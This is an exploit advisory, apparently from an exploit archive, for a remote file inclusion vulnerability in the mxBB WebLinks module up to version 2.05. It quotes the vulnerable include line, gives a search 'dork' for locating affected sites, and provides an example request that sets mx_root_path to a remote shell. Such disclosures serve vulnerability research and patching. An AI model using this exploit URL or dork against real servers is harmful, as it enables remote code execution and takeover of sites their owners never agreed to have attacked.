id: 1263
date: 12/16/2006
title: mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability
author: ajann
cves: 

===========================================================
mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability
===========================================================



*******************************************************************************************
# Title   :  mxBB Module WebLinks <= 2.05(mx_root_path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.mx-system.com
# Dork    :  /modules/mx_links/

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include_once( $mx_root_path .  'modules/mx_links/includes/mx_links_constants.php' );
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-22]  #